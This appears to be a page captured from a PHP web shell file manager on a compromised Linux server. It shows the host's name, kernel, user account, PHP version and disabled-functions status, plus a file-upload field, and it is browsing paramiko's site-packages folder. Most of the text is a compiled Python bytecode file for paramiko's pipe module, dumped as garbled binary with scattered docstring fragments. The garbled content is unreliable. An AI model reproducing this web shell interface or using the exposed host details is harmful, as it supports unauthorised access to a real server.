|
Server : Apache System : Linux cvar2.toservers.com 3.10.0-962.3.2.lve1.5.73.el7.x86_64 #1 SMP Wed Aug 24 21:31:23 UTC 2022 x86_64 User : njnconst ( 1116) PHP Version : 8.4.18 Disable Function : NONE Directory : /proc/self/root/usr/lib/python2.7/site-packages/paramiko/ |
Upload File : |
� x�\c @ s� d Z d d l Z d d l Z d d l Z d � Z d e f d � � YZ d e f d � � YZ d e f d � � YZ d � Z d S( s Abstraction of a one-way pipe where the read end can be used in `select.select`. Normally this is trivial, but Windows makes it nearly impossible. The pipe acts like an Event, which can be set or cleared. When set, the pipe will trigger as readable in `select <select.select>`. i����Nc C s, t j d d k r t � } n t � } | S( Ni t win( t syst platformt PosixPipet WindowsPipe( t p( ( s1 /tmp/pip-install-A1qMVe/paramiko/paramiko/pipe.pyt make_pipe! s R c B s>